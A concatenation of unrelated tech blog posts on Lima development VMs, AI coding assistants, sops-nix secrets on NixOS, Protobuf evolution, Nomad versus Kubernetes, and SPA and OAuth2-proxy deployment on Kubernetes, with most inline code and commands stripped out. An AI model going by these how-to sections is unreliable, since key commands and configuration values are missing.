Dockerfiles. VMs are better suited to emulate a real workstation without the workarounds required by containers. Out of the box, most Lima templates are not locked down, but Lima lets you clone and configure any template before creating or starting a VM. By default, Lima VMs enable read-only file-sharing between the host user's home directory and the VM, which exposes sensitive information to the VM. I configure each VM with project specific file-sharing and no automatic port forwarding. Here's my configuration for . This template can then be used to create a VM instance After creation of the VM is complete, accessing it over SSH can be done transparently via the subcommand. The VM is now ready to be connected to my IDE. I'm mostly a JetBrains IDE user. These IDEs have a Remote Development feature that enables a near local development experience with VMs. A client-server communication model over an SSH tunnel enables this to work. Connecting my IDE to my VM was a 5 minute process that included selecting my Lima SSH config ( ) for the connection and picking a project directory. The most time consuming part of this was waiting for the IDE to download the server component to the VM. After that, the IDE setup was done. I had a fully working IDE and shell access to the VM in the IDE terminals. I haven't found any features that don't work as expected. There is also granular control over SSH port-forwarding between the VM (Remote) and host (local) built in, which is convenient for me when I'm developing a backend application. The integration between Podman/Docker and these IDEs extends to the Remote Development feature as well. I can run a full instance of Podman within my VM, and once the IDE is connected to the VM's instance of Podman, I can easily forward listening ports from my containers back to my host. The switch to VMs took me an afternoon to set up and I get the same development experience with actual security boundaries between untrusted code and my personal data. Lima has made VM-based development surprisingly painless and I'm worried a lot less about the next supply chain attack.

0 views
Jampa.dev 2 months ago

Why AI for coding is so polarizing

If you spend any time online, you've probably seen the wildly different opinions on using LLMs in coding. On one side, Twitter bros bragging about how they built “a $1k revenue app in just 10 days using AI”. On the other hand, engineers who refuse to use any LLM tool at all. You'll find them in every thread, insisting that AI sucks, produces garbage code, and only adds to technical debt. Alt text: The most civilized Anti-AI vs Pro-AI conversation on Twitter. Joking aside, some people use AI to do great things daily, while others have problems with it and have given up.  The difference is context. An LLM has no sapience. Everything the AI cooks up is a product of its training corpus, fine-tuning, and a system + user prompt. (with a bit of randomness for seasoning). No matter how clever your prompt is, the training data is its foundation. This is why companies are so aggressively scraping the web. If you create a new language tomorrow called FunkyScript, the AI will be terrible at it, regardless of your prompt. This explains the different experiences of AI detractors and champions. On the one hand, you have people new to coding working on greenfield projects with popular tools like Tailwind and React (which have a massive training corpus). On the other hand, you have engineers working with more niche tools. A great example is CircleCI’s YAML configuration. Since CircleCI has documentation that's difficult for an AI to ingest (because it sucks). So the AI starts hallucinating and spitting out code for GitHub Actions instead. Then there's the context window, the "short-term memory" of the AI. It's a known issue that the more context you stuff into a prompt, the "dumber" the model can get. When you're working on a greenfield project, there are no existing files or dependencies, so you don't need to provide much context, which saves you from spending tokens on it. But greenfield projects aren't the norm . The norm is a legacy codebase built by multiple people who changed many parts and then left the company. Some of it has parts that don't make sense even to a human, much less to an LLM. All this extra context weighs down the LLM tokens. Consider the same prompt: " Change all the colors to blue on my Auth page ." In a new project, the AI can probably find and handle the relevant files. But on a mature codebase, that auth page is tied to a color system, part of a larger design system. Now the AI is in trouble. Throw in some unit tests that will inevitably break, and the AI is completely lost. "Hey AI, you broke this stuff" — You say, thinking you are not using AI enough Then the AI sycophantly replies: "You are absolutely right! Let me try another approach!" Now you're the one in trouble . It's time to shut the AI down and salvage what you can from the wreckage. This isn't a perfect fix, but there is a strategy to make the AI less destructive and, eventually, genuinely helpful. You'll have to decide if the upfront effort is worth it compared to manually coding. It won't be worth it for the FunkyScript codebase, but I succeeded on niche stacks, like Mobile E2E. In complex codebases, an AI must learn your project's unique patterns with every prompt. The solution is to give it that knowledge upfront, rather than making it rediscover everything at "runtime." Having a good , for example, which an LLM can read before performing a task, helps the AI understand what makes your project different from its base model. Your is not for you to say “ do it right, stop making it wrong ” like a lot of people do. We can even use the AI itself to help. Here is an example prompt. You should provide more high-level context for a real project, especially if your README.md sucks . You are a senior engineer onboarding another senior engineer to our codebase. Analyze the provided files at a high level. Study its structure and patterns, then write a document explaining how to work on it. Highlight the parts that differ from common industry patterns for this language and framework. For example, do you use Bun instead of npm? Inline styles instead of CSS? These are crucial details the model needs to know; otherwise, it will default to the most common patterns in its training data. So, the next time someone gives an opinion on AI that differs from yours, maybe don't immediately jump to arguing. They aren't necessarily doomers who will be replaced, nor are they grifters selling snake oil. Consider that not every engineer works on your stack / codebase. …. or maybe they are all koopas: Thanks for reading Jampa.dev! Subscribe for free to receive my shitposts and Goomba fallacies.

0 views

Secret Management on NixOS with sops-nix

Passwords and secrets like cryptographic key files are everywhere in computing. When configuring a Linux system, sooner or later you will need to put a password somewhere — for example, when I migrated my existing Linux Network Storage (NAS) setup to NixOS , I needed to specify the desired Samba passwords in my NixOS config (or manage them manually, outside of NixOS). For personal computers, this is fine, but if the goal is to share system configurations (for example in a Git repository), we need a different solution: Secret Management. The basic idea behind Secret Management systems is to encrypt the secrets at rest, meaning if somebody clones the git repository containing your NixOS system configurations, they cannot access (and therefore, also not deploy) the encrypted secrets. Conceptually, we need to: In this article, I will show how to accomplish the above using sops-nix. Here’s a quick overview of the three different building blocks we will use: You might wonder why I chose sops-nix over agenix , the other contender? The instructions for setting up sops-nix made more sense to me when I first looked at it, and I wanted to have the option to use sops in other ways, not just with age. If you’re curious about agenix, check out Andreas Gohr’s blog post about agenix . I ran the following instructions on an Arch Linux machine on which I installed the Nix tool and enabled Nix Flakes . Follow the link for instructions also for other systems like Debian or Fedora. I don’t want to manage an extra key file, so I’ll use to derive a key from my SSH private key file, which I already take good care of to back up: (The option is documented in the ssh-to-age README .) To display the age recipient (public key) of this age identity (private key), I used: Similarly, I will derive an age recipient from the SSH host key of the remote system: In my git repository (nix-configs), I have one subdirectory per NixOS system, i.e. shows: In the root of the git repository (next to the directory), I create like so: The more systems I manage, the more and I will need to configure. The creation rules tell sops which keys to use when encrypting a file. In my setups, I typically use only a single file per system, but I could imagine splitting out some secrets into a separate file if I wanted to collaborate with someone on just one aspect of the system. Now that we told sops which recipients to encrypt for, we can decrypt and edit in our configured editor by running: The simplest key file contains just one key, for example: After saving and exiting your editor, sops will update the encrypted secrets/example.yaml. Now, we need to reference the encrypted file in NixOS and enable integration to make the decrypted secrets available on the system. In , I added to the section and added the NixOS module. I show the entire diff because the places where the lines go are just as important as what the lines say: Then, in , we tell to use the SSH host key as identity, where sops will find our secrets and which secrets should realize on the remote system: After deploying, we can access the secret on the running system: Of course, even after rebooting the machine, the secrets remain available without a re-deploy: Now that we have secrets stored in files under , how can we use these secrets? The following sections show a few common ways. Let’s assume you have deployed a custom Go server as a systemd service on NixOS as follows, and you want to start managing the cleartext secret passed via the and command-line flags: With the following sops secrets: …we need to adjust our NixOS config to read these secret files at runtime. Because the directive is interpreted by systemd and not passed through a shell, we use the helper and then just the files: What if the service in question does not use command-line flags, but environment variables for configuring secrets? We can put an environment variable file into a sops-managed secret: …and then we make systemd apply these environment variables from the secrets file: If you are configuring a NixOS module (instead of declaring a custom service), the option might not always be called . For example, for the oauth2-proxy service, you would need to configure the option : In the previous examples, we configured the of each secret to the user account under which the service is running. But what if there is no such user account, because the service use systemd’s feature? We can use systemd’s feature! For example, I supply the SMTP password to my Prometheus Alertmanager as follows: In my blog post “Migrating my NAS from CoreOS/Flatcar Linux to NixOS” , I describe how to configure samba users and passwords (from sops-managed secrets) with an shell script (which is very similar to the techniques already explained). Managing secrets as separately-encrypted files in your config repository makes sense to me! age’s ability to work with SSH keys makes for a really convenient setup, in my opinion. Encrypting secrets for the destination system’s SSH host key feels very elegant. I hope the examples above are sufficient for you to efficiently configure secrets in NixOS! Encrypt the secrets such that the target system can decrypt them. Encrypt the secrets such that other people working on this config can decrypt them. Have the target system decrypt secrets at runtime. Tell our software where to access the decrypted secrets. sops is a tool to version-control secrets in git, in their encrypted form. sops makes it easy to re-encrypt these secrets when adding/removing authorized keys. sops is very flexible and can work with tons of other tools/providers. sops-nix provides a way to integrate sops with Nix/NixOS Using sops with allows us to use our existing SSH private key (humans) or SSH host private key (machines) instead of managing a separate set of key files.

0 views
mcyoung 7 months ago

Protobuf Tip #4: Accepting Mistakes We Can’t Fix

Bad humor is an evasion of reality; good humor is an acceptance of it. –Malcolm Muggeridge TL;DR: Protobuf’s distributed nature introduces evolution risks that make it hard to fix some types of mistakes. Sometimes the best thing to do is to just let it be. I’m editing a series of best practice pieces on Protobuf, a language that I work on which has lots of evil corner-cases.These are shorter than what I typically post here, but I think it fits with what you, dear reader, come to this blog for. These tips are also posted on the buf.build blog . Often, you’ll design and implement a feature for the software you work on, and despite your best efforts to test it, something terrible happens in production. We have a playbook for this, though: fix the bug in your program and ship or deploy the new, fixed version to your users. It might mean working late for big emergencies, but turnaround for most organizations is a day to a week. Most bugs aren’t emergencies, though. Sometimes a function has a confusing name, or an integer type is just a bit too small for real-world data, or an API conflates “zero” and “null”. You fix the API, refactor all usages in your API in one commit, merge, and the fix rolls out gradually. Unless, of course, it’s a bug in a communication API, like a serialization format: your Protobuf types, or your JSON schema, or the not-too-pretty code that parses fields out of dict built from a YAML file. Here, you can’t just atomically fix the world. Fixing bugs in your APIs (from here on, “APIs” means “Protobuf definitions”) requires a different mindset than fixing bugs in ordinary code. Protobuf’s wire format is designed so that you can safely add new fields to a type, or values to an enum, without needing to perform an atomic upgrade. But other changes, like renaming fields or changing their type, are very dangerous. This is because Protobuf types exist on a temporal axis: different versions of the same type exist simultaneously among programs in the field that are actively talking to each other. This means that writers from the future (that is, new serialization code) must be careful to not confuse the many readers from the past (old versions of the deserialization code). Conversely, future readers must tolerate anything past writers produce. In a modern distributed deployment, the number of versions that exist at once can be quite large. This is true even in self-hosted clusters, but becomes much more fraught whenever user-upgradable software is involved. This can include mobile applications that talk to your servers, or appliance software managed by a third-party administrator, or even just browser-service communication. The most important principle: you can’t easily control when old versions of a type or service are no longer relevant. As soon as a type escapes out of the scope of even a single team, upgrading types becomes a departmental effort. There are many places where Protobuf could have made schema evolution easier, but didn’t. For example, changing to is a breakage, even though at the wire format level, it is possible for a parser to distinguish and accept both forms of correctly. There too many other examples to list, but it’s important to understand that the language is not always working in our favor. For example, if we notice a value is too small, and should have been 64-bit, you can’t upgrade it without readers from the past potentially truncating it. But we really have to upgrade it! What are our options? Of course, there is a third option, which is to accept that some things aren’t worth fixing. When the cost of a fix is so high, fixes just aren’t worth it, especially when the language is working against us. This means that even in Buf’s own APIs, we sometimes do things in a way that isn’t quite ideal, or is inconsistent with our own best practices. Sometimes, the ecosystem changes in a way that changes best practice, but we can’t upgrade to it without breaking our users. In the same way, you shouldn’t rush to use new, better language features if they would cause protocol breaks: sometimes, the right thing is to do nothing, because not breaking your users is more important. Issue a new version of the message and all of its dependencies. This is the main reason why sticking a version number in the package name, as enforced by Buf’s lint rule, is so important. Do the upgrade anyway and hope nothing breaks. This can work for certain kinds of upgrades, if the underlying format is compatible, but it can have disastrous consequences if you don’t know what you’re doing, especially if it’s a type that’s not completely internal to a team’s project. Buf breaking change detection helps you avoid changes with potential for breakage.

0 views
ENOSUCHBLOG 10 months ago

Be aware of the Makefile effect

Update 2024-01-12 : Ken Shirriff has an an excellent blog post on why “cargo cult” is a poor term of art. I’m not aware of a perfect 1 term for this, so I’m making one up: the Makefile effect 2 . The Makefile effect boils down to this: Tools of a certain complexity or routine unfamiliarity are not run de novo , but are instead copy-pasted and tweaked from previous known-good examples. You see this effect frequently with engineers of all stripes and skill/experience levels, with Make being a common example 3 : On one level, this is a perfectly good (even ideal) engineering response at the point of solution : applying a working example is often the parsimonious thing to do, and runs a lesser (in theory) risk of introducing bugs, since most of the work is unchanged. However, at the point of design , this suggests a tool design (or tool application 5 ) that is flawed : the tool (or system) is too complicated (or annoying) to use from scratch. Instead of using it to solve a problem from scratch, users repeatedly copy a known-good solution and accrete changes over time. Once you notice it, you start to see this pattern all over the place. Beyond Make: In many cases, perhaps not. However, I think it’s worth thinking about, especially when designing tools and systems: Tools and systems that enable this pattern often have less-than-ideal diagnostics or debugging support: the user has to run the tool repeatedly, often with long delays, to get back relatively small amounts of information. Think about CI/CD setups, where users diagnose their copy-pasted CI/CD by doing print-style debugging over the network with a layer of intermediating VM orchestration. Ridiculous! Tools that enable this pattern often discourage broad learning : a few mavens know the tool well enough to configure it, and others copy it with just enough knowledge to do targeted tweaks. This is sometimes inevitable, but often not: dependency graphs are an inherent complexity of build systems, but remembering the difference between and in Make is not. Tools that enable this pattern are harder to use securely : security actions typically require deep knowledge of the why behind a piece of behavior. Systems that are subject to the Makefile effect are also often ones that enable confusion between code and data (or any kind of in-band signalling more generally), in large part because functional solutions are not always secure ones. Consider, for example, about template injection in GitHub Actions. In general, I think well-designed tools (and systems) should aim to minimize this effect. This can be hard to do in a fully general manner, but some things I think about when designing a new tool: The Makefile effect resembles other phenomena, like cargo culting, normalization of deviance, “write-only language,” &c. I’ll argue in this post that it’s a little different from each of these, insofar as it’s not inherently ineffective or bad and concerns the outcome of specific designs .  ↩ Also note: the title is “be aware,” not “beware.” The Makefile effect is not inherently bad! It’s something to be aware of when designing tools and systems.  ↩ Make is just an example, and not a universal one: different groups of people master different tools. The larger observation is that there are classes of tools/systems that are (more) susceptible to this, and classes that are (relatively) less susceptible to it.  ↩ I’ve heard people joke about their “heritage” s, i.e. s that were passed down to them by senior engineers, professors, &c. The implication is that these forebearers also inherited the , and have been passing it down with small tweaks since time immemorial.  ↩ Complex tools are a necessity; they can’t always be avoided. However, the occurrence of the Makefile effect in a simple application suggests that the tool is too complicated for that application.  ↩ A task (one of a common shape) needs completing. A very similar (or even identical) task has been done before. Make (or another tool susceptible to this effect) is the correct or “best” (given expedience, path dependencies, whatever) tool for the task. Instead of writing a , the engineer copies a previous (sometimes very large and complicated 4 ) from a previous instance of the task and tweaks it until it works in the new context. CI/CD configurations like GitHub Actions and GitLab CI/CD, where users copy their YAML spaghetti from the last working setup and tweak it (often with repeated re-runs) until it works again; Linter and formatter configurations, where a basic set of rules gets copied between projects and strengthened/loosened as needed for local conditions; Build systems themselves, where everything non-trivial begins to resemble the previous build system. Tools and systems that enable this pattern often have less-than-ideal diagnostics or debugging support: the user has to run the tool repeatedly, often with long delays, to get back relatively small amounts of information. Think about CI/CD setups, where users diagnose their copy-pasted CI/CD by doing print-style debugging over the network with a layer of intermediating VM orchestration. Ridiculous! Tools that enable this pattern often discourage broad learning : a few mavens know the tool well enough to configure it, and others copy it with just enough knowledge to do targeted tweaks. This is sometimes inevitable, but often not: dependency graphs are an inherent complexity of build systems, but remembering the difference between and in Make is not. Tools that enable this pattern are harder to use securely : security actions typically require deep knowledge of the why behind a piece of behavior. Systems that are subject to the Makefile effect are also often ones that enable confusion between code and data (or any kind of in-band signalling more generally), in large part because functional solutions are not always secure ones. Consider, for example, about template injection in GitHub Actions. Does it need to be configurable? Does it need syntax of its own? As a corollary: can it reuse familiar syntax or idioms from other tools/CLIs? Do I end up copy-pasting my use of it around? If so, are others likely to do the same? The Makefile effect resembles other phenomena, like cargo culting, normalization of deviance, “write-only language,” &c. I’ll argue in this post that it’s a little different from each of these, insofar as it’s not inherently ineffective or bad and concerns the outcome of specific designs .  ↩ Also note: the title is “be aware,” not “beware.” The Makefile effect is not inherently bad! It’s something to be aware of when designing tools and systems.  ↩ Make is just an example, and not a universal one: different groups of people master different tools. The larger observation is that there are classes of tools/systems that are (more) susceptible to this, and classes that are (relatively) less susceptible to it.  ↩ I’ve heard people joke about their “heritage” s, i.e. s that were passed down to them by senior engineers, professors, &c. The implication is that these forebearers also inherited the , and have been passing it down with small tweaks since time immemorial.  ↩ Complex tools are a necessity; they can’t always be avoided. However, the occurrence of the Makefile effect in a simple application suggests that the tool is too complicated for that application.  ↩

0 views
Karan Sharma 2 years ago

Nomad can do everything that K8s can

This blog post is ignited by the following Twitter exchange : I don’t take the accusation of unsubstantiated argument, especially on a technical topic lightly. I firmly believe in substantiated arguments and hence, here I am, elaborating on my stance. If found mistaken, I am open to corrections and revise my stance. In my professional capacity, I have run and managed several K8s clusters (using AWS EKS) for our entire team of devs ( been there done that ). The most complex piece of our otherwise simple and clean stack was K8s and we’d been longing to find a better replacement. None of us knew whether that would be Nomad or anything else. But we took the chance and we have reached a stage where we can objectively argue that, for our specific workloads, Nomad has proven to be a superior tool compared to K8s. Nomad presents a fundamental building block approach to designing your own services. It used to be true that Nomad was primarily a scheduler, and for serious production workloads, you had to rely on Consul for service discovery and Vault for secret management. However, this scenario has changed as Nomad now seamlessly integrates these features, making them first-class citizens in its environment. Our team replaced our HashiCorp stack with just Nomad, and we never felt constrained in terms of what we could accomplish with Consul/Vault. While these tools still hold relevance for larger clusters managed by numerous teams, they are not necessary for our use case. Kubernetes employs a declarative state for every operation in the cluster, essentially operating as a reconciliation mechanism to keep everything in check. In contrast, Nomad requires dealing with fewer components, making it appear lacking compared to K8s’s concept of everything being a “resource.” However, that is far from the truth. One of my primary critiques of K8s is its hidden complexities. While these abstractions might simplify things on the surface, debugging becomes a nightmare when issues arise. Even after three years of managing K8s clusters, I’ve never felt confident dealing with databases or handling complex networking problems involving dropped packets. You might argue that it’s about technical chops, which I won’t disagree with - but then do you want to add value to the business by getting shit done or do you want to be the resident K8s whiz at your organization? Consider this: How many people do you know who run their own K8s clusters? Even the K8s experts themselves preach about running prod clusters on EKS/GKE etc. How many fully leverage all that K8s has to offer? How many are even aware of all the network routing intricacies managed by kube-proxy? If these queries stir up clouds of uncertainty, it’s possible you’re sipping the Kubernetes Kool-Aid without truly comprehending the recipe, much like I found myself doing at one point Now, if you’re under the impression that I’m singing unabashed praises for Nomad, let me clarify - Nomad has its share of challenges. I’ve personally encountered and reported several. However, the crucial difference lies in Nomad’s lesser degree of abstraction, allowing for a comprehensive understanding of its internals. For instance, we encountered service reconciliation issues with a particular Nomad version. However, we could query the APIs, identify the problem, and write a bash script to resolve and reconcile it. It wouldn’t have been possible when there are too many moving parts in the system and we don’t know where to even begin debugging. The YAML hell is all too well known to all of us. In K8s, writing job manifests required a lot of effort (by the developers who don’t work with K8s all day) and were very complex to understand. It felt “too verbose” and involved copy pasting large blocks from the docs and trying to make things work. Compare that to HCL, it feels much nicer to read and shorter. Things are more straightforward to understand. I’ve not even touched upon the nice-ities on Nomad yet. Like better humanly understandable ACLs? Cleaner and simpler job spec, which defines the entire job in one file? A UI which actually shows everything about your cluster, nodes, and jobs? Not restricting your workloads to be run as Docker containers? A single binary which powers all of this? The central question this post aims to raise is: What can K8s do that Nomads can’t, especially considering the features people truly need? My perspectives are informed not only by my organization but also through interactions with several other organizations at various meetups and conferences. Yet, I have rarely encountered a use case that could only be managed by K8s. While Nomad isn’t a panacea for all issues, it’s certainly worth a try. Reducing the complexity of your tech stack can prove beneficial for your applications and, most importantly, your developers. At this point, K8s enjoys immense industry-wide support, while Nomad remains the unassuming newcomer. This contrast is not a negative aspect, per se. Large organizations often gravitate towards complexity and the opportunity to engage more engineers. However, if simplicity were the primary goal, the prevailing sense of overwhelming complexity in the infrastructure and operations domain wouldn’t be as pervasive. I hope my arguments provide a more comprehensive perspective and address the earlier critique of being unsubstantiated. Darren has responded to this blog post. You can read the response on Twitter . Ingress : We run a set of HAProxy on a few nodes which act as “L7 LBs”. Configured with Nomad services, they can do the routing based on Host headers. DNS : To provide external access to a service without using a proxy, we developed a tool that scans all services registered in the cluster and creates a corresponding DNS record on AWS Route53. Monitoring : Ah my fav. You wanna monitor your K8s cluster. Sure, here’s kube-prometheus , prometheus-operator , kube-state-metrics . Choices, choices. Enough to confuse you for days. Anyone who’s ever deployed any of these, tell me why this thing needs such a monstrosity setup of CRDs and operators. Monitoring Nomad is such a breeze, 3 lines of HCL config and done. Statefulsets : It’s 2023 and the irony is rich - the recommended way to run a database inside K8s is… not to run it inside K8s at all. In Nomad, we run a bunch of EC2 instances and tag them as nodes. The DBs don’t float around as containers to random nodes. And there’s no CSI plugin reaching for a storage disk in AZ-1 when the node is basking in AZ-2. Running a DB on Nomad feels refreshingly like running it on an unadorned EC2 instance. Autoscale : All our client nodes (except for the nodes) are ephemeral and part of AWS’s Auto Scaling Groups (ASGs). We use ASG rules for the horizontal scaling of the cluster. While Nomad does have its own autoscale, our preference is to run large instances dedicated to specific workloads, avoiding a mix of different workloads on the same machine.

0 views

The yaml document from hell

As a data format, yaml is extremely complicated and it has many footguns. In this post I explain some of those pitfalls by means of an example, and I suggest a few simpler and safer yaml alternatives.

0 views
alikhil 6 years ago

Deploy SPA application to Kubernetes

Hello, folks! Today I want you to share with you tutorial on how to deploy your SPA application to Kubernetes. Tutorial is oriented for those don’t very familiar with docker and k8s but want their single page application run in k8s. I expect that you have docker installed in your machine. If it isn’t you can install it by following official installation guide . As SPA project I will use vue-realworld-example-app as SPA project. You can your own SPA project if you have one. So, I have cloned it, installed dependencies and built: Next step is to decide how our application will be served. There are bunch of possible solutions but I decided to use nginx since it recommends itself as one of the best http servers. To serve SPA we need to return all requested files if they exist or otherwise fallback to index.html. To do so I wrote the following nginx config: Full config file can be found in my fork of the repo Then, we need to write Dockerfile for building image with our application. Here it is: We assume that artifacts of build placed in the directory and so that during the docker build the content of directory copied into containers directory. Now, we are ready to build it: And run it: Then if we open http://localhost:8080 we will see something similar to: Cool! It works! We will need to use our newly builded docker image to deploy to k8s. So, we need to make it available from the k8s cluster by pulling to some docker registry. I will push image to DockerHub : To run the application in k8s we will use resource type. Here it is: deployment.yaml Then we create deployment by running and newly created pods can found: Then we need to expose our app to the world. It can be done by using service of type NodePort or via Ingress. We will do it with Ingress. For that we will need service: service.yaml And ingress itself: ingress.yaml And here it is! Our SPA runs in the k8s!

0 views
alikhil 7 years ago

Oauth2 Proxy for Kubernetes Services

Hello, folks! In this post, I will go through configuring Bitly OAuth2 proxy in a kubernetes cluster. There is a fresh tutorial about oauth2-proxy A few days ago I was configuring SSO for our internal dev-services in KE Technologies . And I spent the whole to make it work properly, and at the end I decided that I will share my experience by writing this post, hoping that it will help others(and possibly me in the future) to go through this process. We have internal services in our k8s cluster that we want to be accessible for developers. It can be kubernetes-dashboard or kibana or anything else. Before that we used Basic Auth, it’s easy to setup in ingresses. But this approach has several disadvantages: What we want is that developer will log in once and will have access to all other services without additional authentication. So, a possible scenario could be: Using kube-lego for configuring Let’s Encrypt certificates is depricated now. Consider using cert-manager instead. Initialy, when I was writing this post I was using old version of nginx 0.9.0, because it did not work correctly on newer version. Now, I found the problem and it have been fixed in 0.18.0 release. But ingress exposing private services should be updated( more details ): First of all, we need a Kubernetes cluster. I will use the newly created cluster in Google Cloud Platform with version 1.8.10-gke.0 . If you have a cluster with configured ingress and https you can skip this step. Then we need to install nginx ingress and kube lego . Let’s do it using helm: without RBAC: After it’s installed we can retrieve controller IP address: and create DNS record to point our domain and subdomains to this IP address. Let’s run simple HTTP server as service and expose it using nginx ingress: example-ing.yaml Wait for a few seconds and open https://service.example.com and you should see something similar to this: In this post, we will use GitHub accounts for authentication. So, go to https://github.com/settings/applications/new and create new OAuth application Fill Authorization callback URL field with https://auth.example.com/oauth2/callback where example.com is your domain name. After creating an application you will have Client ID and Client Secret which we will need in next step. There are a lot of docker images for OAuth proxy, but we can not use them because they do not support domain white-listing. The problem is that such functionality has not implemented yet. Actualy there are several PRs that solve that problem but seems to be they frozen for an unknown amount of time. So, the only thing I could do is to merge one of the PRs to current master and build own image. You also can use my image, but if you worry about security just clone my fork and build image yourself. Let’s create a namespace and set it as current: oauth-proxy.deployment.yml oauth-service.yml oauth-ing.yml You can update ingress that we used while configuring nginx-ingress or create a new one: example-ing.yml Then visit service.example.com and you will be redirected to GitHub authorization page: And once you authenticate, you will have access to all your services under ingress that point to auth.example.com until cookie expires. And that’s it! Now you can put any of your internal services behind ingress with OAuth. Here is a list of resources that helped me to go through this proccess first time: We need to share a single pair of login and password for all services among all developers Developers will be asked to enter credentials each time when they access service first time Developers open https://kibana.example.com which is internal service Browser redirects them to https://auth.example.com where they sign in After successful authentication browser redirects them to https://kibana.example.com https://eng.fromatob.com/post/2017/02/lets-encrypt-oauth-2-and-kubernetes-ingress/ https://www.midnightfreddie.com/oauth2-proxy.html https://thenewstack.io/single-sign-on-for-kubernetes-dashboard-experience/

0 views